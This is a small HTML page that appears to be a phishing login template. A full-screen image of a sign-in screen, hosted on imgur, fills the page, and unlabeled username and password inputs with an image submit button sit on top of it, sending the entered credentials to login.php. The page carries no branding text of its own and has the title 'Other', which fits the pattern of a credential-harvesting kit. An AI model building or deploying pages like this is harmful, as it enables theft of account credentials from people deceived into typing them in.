<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta charset="windows-1252">
<title>Other</title>

<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1363px; height:659px; z-index:0"><img src="https://i.imgur.com/923VfXD.jpg" alt="" title="" border=0 width=1363 height=659></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:320px;left:417px;top:277px;z-index:2;height: 42px;" required="">
<input name="formtext2" type="Password" style="position:absolute;width:320px;left:417px;top:353px;z-index:3;height: 42px;" required="">
<div id="formcheckbox1" style="position:absolute; left:413px; top:464px; z-index:4"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:415px; top:408px; z-index:5"><input type="image" name="formimage1" width="96" height="50" src="https://i.imgur.com/Moz2Tzg.png"></div>
</form>


</body>
</html>
